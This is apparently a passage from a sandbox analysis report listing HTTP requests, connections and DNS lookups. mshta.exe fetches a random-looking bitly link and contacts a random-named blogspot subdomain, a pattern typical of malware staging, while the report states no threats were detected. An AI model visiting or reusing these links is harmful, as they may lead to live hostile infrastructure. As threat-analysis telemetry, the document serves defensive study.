2960 | mshta.exe | GET | 301 | 67.199.248.14:80 | http://bitly.com/tywuiqdbshagdjshadvgha | US | html | 159 b | shared
2088 | chrome.exe | GET | 302 | 172.217.18.110:80 | http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx | US | html | 555 b | whitelisted
2088 | chrome.exe | GET | 200 | 172.217.130.72:80 | http://r3---sn-2gb7sn7r.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx?cms_redirect=yes&mh=e_&mip=45.86.202.16&mm=28&mn=sn-2gb7sn7r&ms=nvh&mt=1643058263&mv=m&mvi=3&pl=24&shardbypass=yes&smhost=r3---sn-2gb7sn7s.gvt1.com | US | crx | 242 Kb | whitelisted

Connections (PID | Process | IP | Domain | ASN | CN | Reputation)

2088 | chrome.exe | 142.250.74.195:443 | www.gstatic.com | Google Inc. | US | whitelisted
2960 | mshta.exe | 142.250.186.131:80 | ocsp.pki.goog | Google Inc. | US | whitelisted
2960 | mshta.exe | 142.250.186.41:443 | www.blogger.com | Google Inc. | US | unknown
2960 | mshta.exe | 216.58.212.169:443 | resources.blogblog.com | Google Inc. | US | whitelisted
2088 | chrome.exe | 142.250.185.227:443 | clientservices.googleapis.com | Google Inc. | US | whitelisted
2088 | chrome.exe | 142.250.185.106:443 | fonts.googleapis.com | Google Inc. | US | whitelisted
2960 | mshta.exe | 67.199.248.14:80 | bitly.com | Bitly Inc | US | shared
2088 | chrome.exe | 142.250.186.78:443 | clients2.google.com | Google Inc. | US | whitelisted
2960 | mshta.exe | 142.250.184.193:443 | dhjkasdhaksdbaksdhkasargya.blogspot.com | Google Inc. | US | whitelisted
2088 | chrome.exe | 142.250.185.100:443 | www.google.com | Google Inc. | US | whitelisted

DNS requests (domain: resolved IPs; reputation)

bitly.com: 67.199.248.14, 67.199.248.15; shared
dhjkasdhaksdbaksdhkasargya.blogspot.com: 142.250.184.193; whitelisted
ctldl.windowsupdate.com: 93.184.221.240; whitelisted
ocsp.pki.goog: 142.250.186.131; whitelisted
www.blogger.com: 142.250.186.41, 142.250.184.201, 142.250.181.233; shared
resources.blogblog.com: 216.58.212.169, 142.250.184.201, 142.250.181.233; whitelisted
clientservices.googleapis.com: 142.250.185.227; whitelisted
www.google.com: 142.250.185.100; whitelisted
clients2.google.com: 142.250.186.78; whitelisted
accounts.google.com: 142.250.186.45; shared

Threats

No threats detected
No debug info